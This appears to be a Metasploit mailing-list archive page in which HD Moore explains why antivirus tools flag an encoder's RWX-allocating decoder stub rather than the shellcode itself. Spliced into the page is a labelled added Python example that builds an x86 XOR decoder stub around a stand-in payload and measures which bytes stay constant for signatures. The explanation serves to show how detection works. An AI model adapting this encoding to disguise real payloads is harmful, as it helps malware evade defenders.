Metasploit mailing list archives
Re: Payload AV evasion thoughts...
From: HD Moore <hdm () metasploit com>
Date: Mon, 18 Apr 2011 10:16:30 -0500
On 4/18/2011 8:09 AM, John B wrote:
Combine that with code to make it portable across all systems, then add an encoding stub, and we can create unique payloads every time without the need for templates (with the assumption that the templates are the main way of detecting payloads). I will continue to work on some full examples, but anyone with asm experience who could create some dynamic encoders with Metasm would really be helpful.
The current encoder actually does this today; it uses metasm to compile a slightly randomized (via jumps and nops) stub. The main problem is that we use a stub to create a RWX segment, which we copy the real shellcode to, which is then executed. The AVs generally catch the stub that creates the RWX segment, NOT the actual shellcode. The reason for this is encoding: you can't encode the stub, since the stub has to be RWX. A bit of a chicken and egg, and making the segment itself RWX triggers even more signatures.

-HD
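The point HD makes above (the encoded payload changes every time, the decoder stub in front of it does not, so that is what signatures key on) can be shown with a few lines of Python. The following is an added example, not code from the thread or from Metasploit's encoders: a minimal hand-assembled 32-bit x86 XOR decoder stub of the classic JMP/CALL/POP shape, placed in front of a payload, with a helper that diffs many instances built with different keys to find the bytes that never change. The stub here decodes in place and assumes it already sits in executable, writable memory; the separate "allocate a RWX segment and copy" step HD describes is not modeled. The payload bytes are a constructed stand-in, not real shellcode.

```python
import os
from typing import Iterable, List, Set

# Hand-assembled 32-bit x86 decoder stub (hypothetical, written for this example).
# Layout with byte offsets:
#   00  EB 0D              jmp short call_decoder
#   02  5E                 decoder: pop esi        ; esi -> start of encoded payload
#   03  31 C9              xor ecx, ecx
#   05  B1 <len>           mov cl, <len>           ; payload length, 1..255
#   07  80 36 <key>        decode: xor byte [esi], <key>
#   0A  46                 inc esi
#   0B  E2 FA              loop decode             ; rel8 -6 -> offset 07
#   0D  EB 05              jmp short payload       ; rel8 +5 -> offset 14
#   0F  E8 EE FF FF FF     call_decoder: call decoder ; rel32 -18 -> offset 02
#   14  ...                payload: <encoded bytes follow>
STUB_LEN = 20
LEN_OFFSET = 6   # only immediate that depends on the payload size
KEY_OFFSET = 9   # only immediate that depends on the key


def build_stub(key: int, length: int) -> bytes:
    """Return the 20-byte decoder stub for a given XOR key and payload length."""
    if not 0 <= key <= 0xFF:
        raise ValueError("key must fit in one byte")
    if not 1 <= length <= 0xFF:
        raise ValueError("mov cl, imm8 limits the payload to 255 bytes")
    return bytes([
        0xEB, 0x0D,                    # jmp short call_decoder
        0x5E,                          # pop esi
        0x31, 0xC9,                    # xor ecx, ecx
        0xB1, length,                  # mov cl, <len>
        0x80, 0x36, key,               # xor byte [esi], <key>
        0x46,                          # inc esi
        0xE2, 0xFA,                    # loop decode
        0xEB, 0x05,                    # jmp short payload
        0xE8, 0xEE, 0xFF, 0xFF, 0xFF,  # call decoder
    ])


def xor_encode(payload: bytes, key: int) -> bytes:
    """Single-byte XOR; the stub applies the same operation at runtime to undo it."""
    return bytes(b ^ key for b in payload)


def build_blob(payload: bytes, key: int) -> bytes:
    """Decoder stub followed by the encoded payload, i.e. what would be delivered."""
    return build_stub(key, len(payload)) + xor_encode(payload, key)


def emulate_decoder(blob: bytes) -> bytes:
    """Do in Python what the stub does on the CPU: read len and key, XOR the tail."""
    length = blob[LEN_OFFSET]
    key = blob[KEY_OFFSET]
    encoded = blob[STUB_LEN:STUB_LEN + length]
    return xor_encode(encoded, key)


def variable_positions(blobs: Iterable[bytes]) -> Set[int]:
    """Byte offsets at which the given blobs do not all agree.

    Everything outside this set is constant across samples and therefore
    available to a byte-pattern signature.
    """
    blobs = list(blobs)
    if len({len(b) for b in blobs}) != 1:
        raise ValueError("all blobs must have the same length")
    return {i for i in range(len(blobs[0])) if len({b[i] for b in blobs}) > 1}


def constant_prefix(blobs: Iterable[bytes]) -> bytes:
    """The longest leading run of bytes shared by every sample (a naive signature)."""
    blobs = list(blobs)
    n = 0
    while n < len(blobs[0]) and all(b[n] == blobs[0][n] for b in blobs):
        n += 1
    return blobs[0][:n]


def demo(samples: int = 32) -> Set[int]:
    """Encode one payload with many random keys and report what stays constant."""
    payload = bytes(range(0x10, 0x30))  # constructed stand-in, not real shellcode
    keys: List[int] = []
    while len(keys) < samples:
        k = os.urandom(1)[0]
        if k != 0 and k not in keys:    # key 0 is a no-op and emits a null byte
            keys.append(k)
    blobs = [build_blob(payload, k) for k in keys]
    assert all(emulate_decoder(b) == payload for b in blobs)
    varying = variable_positions(blobs)
    print("bytes that change between samples:", sorted(varying))
    print("constant prefix usable as a signature:", constant_prefix(blobs).hex())
    return varying


if __name__ == "__main__":
    demo()
```

Running this shows that across any number of keys only offset 9 (the key immediate) and the payload bytes themselves vary; the first nine bytes, EB 0D 5E 31 C9 B1 xx 80 36, are identical every time, which is the "stub, not the shellcode" detection surface HD describes. Randomizing the stub with junk jumps and nops, as the metasm-compiled encoder does, shrinks that constant prefix but cannot remove it entirely, since whatever does the decoding still has to execute unencoded.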
Current thread:
- Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... HD Moore (Apr 18)
- Re: Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... egypt (Apr 18)
- Re: Payload AV evasion thoughts... John B (Apr 21)
- Re: Payload AV evasion thoughts... John B (Apr 18)
- Re: Payload AV evasion thoughts... HD Moore (Apr 18)